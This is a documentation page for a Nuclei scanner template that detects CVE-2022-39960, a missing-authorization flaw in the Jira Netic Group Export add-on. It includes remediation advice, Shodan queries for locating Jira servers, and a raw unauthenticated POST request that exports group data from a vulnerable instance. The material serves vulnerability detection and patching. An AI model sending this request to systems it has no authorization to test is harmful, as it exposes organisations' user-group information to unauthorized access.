Skip to content
Nuclei Templates

Jira Netic Group Export <1.0.3 - Missing Authorization

ID: CVE-2022-39960

Severity: medium

Author: For3stCo1d

Tags: cve,cve2022,atlassian,jira,netic,unauth

Description

Section titled “Description”

Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.

YAML Source

Section titled “YAML Source”
id: CVE-2022-39960


info:
  name: Jira Netic Group Export <1.0.3 - Missing Authorization
  author: For3stCo1d
  severity: medium
  description: |
    Jira Netic Group Export add-on before 1.0.3 contains a missing authorization vulnerability. The add-on does not perform authorization checks, which can allow an unauthenticated user to export all groups from the Jira instance by making a groupexport_download=true request to a plugins/servlet/groupexportforjira/admin/ URI and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive data.
  remediation: |
    Upgrade to Jira Netic Group Export version 1.0.3 or later to fix the missing authorization issue.
  reference:
    - https://gist.github.com/CveCt0r/ca8c6e46f536e9ae69fc6061f132463e
    - https://marketplace.atlassian.com/apps/1222388/group-export-for-jira/version-history
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39960
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/Henry4E36/POCS
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-39960
    cwe-id: CWE-862
    epss-score: 0.19471
    epss-percentile: 0.9629
    cpe: cpe:2.3:a:netic:group_export:*:*:*:*:*:jira:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: netic
    product: group_export
    framework: jira
    shodan-query:
      - http.component:"Atlassian Jira"
      - http.component:"atlassian jira"
  tags: cve,cve2022,atlassian,jira,netic,unauth


http:
  - raw:
      - |
        POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        groupexport_searchstring=&groupexport_download=true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"jiraGroupObjects"'
          - '"groupName"'
        condition: and


      - type: word
        part: header
        words:
          - "attachment"
          - "jira-group-export"
        condition: and


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ad29c3d4ccb11d6a693272b862a425fa22f75be4bc81209e86822843171a8340022100f72a5b2e74283f628f4f2a815deee6ac98e24571c37c18eece48a21081e297cd:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-39960.yaml"

View on Github